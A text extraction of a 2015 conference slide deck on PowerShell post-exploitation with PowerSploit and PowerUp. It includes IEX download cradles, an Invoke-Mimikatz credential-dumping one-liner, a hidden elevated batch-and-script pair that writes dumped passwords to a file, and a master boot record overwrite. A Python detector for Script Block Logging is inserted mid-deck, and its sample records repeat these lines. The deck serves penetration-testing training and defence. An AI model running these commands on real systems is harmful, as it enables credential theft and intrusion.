
Page 1: POST-EXPLOITATION WITH WINDOWS POWERSHELL

Jerold Hoong, OSCP Associate, Singapore
27th May 2015
ASPAC Hacknet Conference and Security Training

POST-EXPLOITATION WITH WINDOWS POWERSHELL

Page 2

© 2014 KPMG Asia Pacific Limited, a limited liability and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative (“KPMG International”), a Swiss entity. All rights reserved.

Agenda

No. CHAPTER

1 PowerShell 101

2 Exploitation Frameworks

3 Overview on PowerSploit and Veil-PowerTools’s PowerUp Module

4 Installing PowerSploit / PowerUp

5 Network of Demo Scenario

6 Demo

7 Next Steps?

8 Questions and Answers

~EOF~

Page 3

What is this presentation about?

This presentation will showcase the use of PowerShell scripting exploitation frameworks coupled with various penetration testing tools and AV evasion techniques for post-exploitation on compromised hosts.

Mimikatz

Page 4

PowerShell 101

What is PowerShell?

• Similar to Unix’s Bash shell, aka Bash for Windows
• Task-based command-line shell and scripting language
• Installed by default on Windows Server 2008, 2012, 7, 8 and 10
• Used by system administrators to automate tasks and configure Windows servers

Why use PowerShell as an attacker?

• Provides access to almost everything on a Windows platform
• Supported on Windows XP
• Easy to learn and powerful
• Has the ability to execute scripts in memory (AV evasion)
• Has a powerful scripting environment bundled together (PowerShell ISE)

Page 5

Exploitation Frameworks

PowerSploit

• Collection of Microsoft PowerShell modules and scripts that can be used to aid penetration testers during all phases of an assessment.
• Available in Kali Linux by default at /usr/share/powersploit (git clone to get the “bleeding edge”).
• Written by Matt Graeber.

Veil-PowerTools

• Collection of PowerShell modules and scripts with a focus on offensive operations.
• Consists of PewPewPew, PowerBreach, PowerPick, PowerUp and PowerView components.
• The PowerUp component will be shown in the demo later.
• Written by @harmj0y and @sixdub.

Nishang

• Framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation.
• Written by Nikhil Mittal.

Page 6

Overview of PowerSploit

Categories of PowerShell Scripts in PowerSploit

• Code Execution (DLL and Shellcode Injection)
• Script Modification (Script encryption, encoding and compression utility)
• Persistence (Backdoor)
• Antivirus Bypass
• Exfiltration
• Mayhem
• Recon

Code Execution – Invoke-Shellcode

• The Invoke-Shellcode function available from the Invoke-Shellcode.ps1 script allows injection of shellcode into the process ID of your choice or into PowerShell locally.
• This functionality will be demonstrated in the demo scenario later.

Page 7

Overview of Veil-PowerTools’s PowerUp

PowerUp!

• PowerUp was created to allow a clean way to audit client systems for common Windows privilege escalation vectors. It utilizes various service abuse checks, .dll hijacking opportunities, registry checks, and more to enumerate common ways that you might be able to elevate on a target system.

Module Functions

• Service Enumeration
• Service Abuse
• DLL Hijacking
• Registry Checks
• Misc. Checks
• More on this in the demo later.

Page 8

Installing PowerSploit / PowerUp

It is simple:

• git clone: https://github.com/mattifestation/PowerSploit
• git clone: https://github.com/Veil-Framework/PowerTools/tree/master/PowerUp

Alternatively, you can download the zip archive directly from GitHub.

Page 9

Importing Modules and Scripts

There are 2 ways to import modules and scripts:

1. Normal way, requires module/script to be on the host locally.

• Import-Module <Module/Script>

OR

2. Quick way, module/script can be at a remote location and imported into PowerShell’s memory context using the IEX download cradle:

• IEX (New-Object Net.WebClient).DownloadString("http://SERVER/script.ps1")

Page 10

Importing Modules and Scripts

Using the IEX cradle to download and load a script straight from GitHub

Page 11

Network of Demo Scenario

Simplified Demo Scenario

Network: 192.168.56.0/24
Victim: Windows PC, 192.168.56.101
Attacker: Kali Linux, 192.168.56.103

Page 12

Techniques Covered in the Demo

Pre-Exploitation Reconnaissance

• Conducting discovery scans with ARP and port scanner tools

Post-Exploitation with Limited Access User Account

• Identifying current available privileges
• Checking running services for misconfigurations
• Obtaining a stealthy meterpreter shell
• Using ring0 kernel exploits for privilege escalation

Post-Exploitation with Full Administrator Account

• Dumping account credentials with the mimikatz tool
• Enabling RDP remotely to gain interactive access
• Running exfiltration tools like keyloggers

Page 13

Demo

Page 14

Demo – srvcheck3.exe Sample Output

Page 15

Next Steps?

Now that we have full administrator access, what else could PowerSploit do? You can experiment with the different modules, such as:

Persistence.ps1

• Allows you to have persistent access to the compromised host, such as automatically running a reverse TCP shell connection back to your attacking Kali host every time a victim user logs in successfully.

Page 16

Next Steps?

Invoke-Mimikatz.ps1

Dump Windows credentials using Mimikatz, which we already did with the msfconsole.

• Example: powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Page 17

Next Steps?

Example:

passwd.bat

@ECHO OFF
PowerShell.exe -windowstyle hidden -NoProfile -Command "& {Start-Process PowerShell.exe -ArgumentList '-windowstyle hidden -NoProfile -ExecutionPolicy Bypass -File ""%~dpn0.ps1""' -Verb RunAs}"

passwd.ps1

$ScriptPath = Split-Path -Parent $MyInvocation.MyCommand.Definition
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -DumpCreds > $ScriptPath\pass.txt
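The defender's answer to "executes in memory" on slide 4 is that the script text still has to reach the PowerShell engine, and with Script Block Logging (Event ID 4104, available from PowerShell 5.0) enabled, the IEX download cradle of slide 9, the hidden -ExecutionPolicy Bypass launcher and Invoke-Mimikatz cradle of slides 16 and 17, and the Set-MasterBootRecord call on the Mayhem slide all end up in the event log in clear text. The Python below is an added detection example, not part of this deck: it triages constructed 4104-style records for exactly the patterns shown on these slides. The record IDs, user names and script text are constructed sample data, and the indicator names are local choices.

```python
"""Triage PowerShell Script Block Logging (Event ID 4104) records for the
patterns shown in the slides: the IEX download cradle, the hidden
-ExecutionPolicy Bypass launcher, Invoke-Mimikatz and friends.

Added defensive example; not part of the original deck. The records below
are constructed sample data, and the indicator names are local choices."""

import re
from dataclasses import dataclass

# Indicator name -> regexes that must ALL match the normalized script text.
# Pairing terms (IEX *and* DownloadString) keeps ordinary admin use of a
# single cmdlet from firing.
INDICATORS = {
    "download_cradle": [r"\b(iex|invoke-expression)\b",
                        r"downloadstring|downloadfile|downloaddata"],
    "hidden_bypass_launch": [r"-w(indowstyle)?\s+hidden",
                             r"(-ex(ecutionpolicy)?|-ep)\s+bypass"],
    "elevation_from_script": [r"start-process", r"-verb\s+runas"],
    "credential_dump": [r"invoke-mimikatz|-dumpcreds"],
    "shellcode_injection": [r"invoke-shellcode"],
    "mbr_tamper": [r"set-masterbootrecord"],
    "hosted_tool_source": [r"raw\.githubusercontent\.com/[^/\s]+/(powersploit|powertools)"],
}


@dataclass
class ScriptBlockEvent:
    record_id: int
    user: str
    script_block_text: str


def normalize(text):
    """Lowercase (cmdlet names are case-insensitive) and drop backticks,
    PowerShell's escape character, which is a cheap way to split keywords
    (I`E`X) past naive string matching."""
    return text.replace("`", "").lower()


def match_indicators(text):
    """Return the names of all indicators whose patterns all match."""
    norm = normalize(text)
    return [name for name, pats in INDICATORS.items()
            if all(re.search(p, norm) for p in pats)]


def triage(events):
    """Map record_id -> indicator names for every event with at least one hit."""
    findings = {}
    for ev in events:
        hits = match_indicators(ev.script_block_text)
        if hits:
            findings[ev.record_id] = hits
    return findings


# Constructed 4104-style records (not real telemetry). 1001 is a benign
# admin script; the rest mirror the command lines shown on the slides.
SAMPLE_EVENTS = [
    ScriptBlockEvent(1001, "CORP\\admin",
        r"Get-Service | Where-Object { $_.Status -eq 'Running' } | Export-Csv C:\reports\services.csv"),
    ScriptBlockEvent(1002, "CORP\\user1",
        'IEX (New-Object Net.WebClient).DownloadString("http://SERVER/script.ps1")'),
    ScriptBlockEvent(1003, "CORP\\user1",
        r"& {Start-Process PowerShell.exe -ArgumentList '-windowstyle hidden -NoProfile "
        r"-ExecutionPolicy Bypass -File C:\Users\demo\passwd.ps1' -Verb RunAs}"),
    ScriptBlockEvent(1004, "CORP\\user1",
        'IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/'
        'mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); '
        'Invoke-Mimikatz -DumpCreds'),
    ScriptBlockEvent(1005, "CORP\\user1",
        "I`E`X (New-Object Net.WebClient).DownloadString('http://192.168.56.103/Invoke-Shellcode.ps1')"),
]


def main():
    for rid, hits in triage(SAMPLE_EVENTS).items():
        print(f"record {rid}: {', '.join(hits)}")


if __name__ == "__main__":
    main()
```

The matching is a triage aid, not a verdict: it is case-insensitive and strips backticks, which covers the simplest keyword-splitting trick, but an -EncodedCommand payload has to be base64-decoded before it is fed in, and the benign record 1001 shows why each indicator pairs two terms rather than alerting on every DownloadString or Start-Process an administrator types.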

Page 18

Next Steps?

Invoke-Portscan.ps1 (Alternative if no Nmap is installed on compromised host)

Conduct further recon on compromised host’s network.

• Example: Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet

Page 19

Next Steps?

Mayhem Module:

• Set-MasterBootRecord -BootMessage ""

~Quick Demo~

Page 20

Questions?

Page 21

Sources and References

No. URL

1 www.trustedsec.com/files/PowerShell_Defcon.pdf

2 https://github.com/Veil-Framework/PowerTools

3 http://www.powershelladmin.com/wiki/Ascii_art_characters_powershell_script

4 https://www.pentestgeek.com/2013/09/18/invoke-shellcode/

5 https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scripting-powersploit-veil

6 http://www.harmj0y.net/blog/category/powershell/

7 https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerUp/README.md

Page 22

~EOF~

Page 23

Thank you

Presentation by Jerold Hoong

Page 24

© 2015 KPMG LLP, a UK limited liability partnership, is a subsidiary of KPMG Europe LLP and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative, a Swiss entity. All rights reserved.

The KPMG name, logo and “cutting through complexity” are registered trademarks or trademarks of KPMG International Cooperative (KPMG International).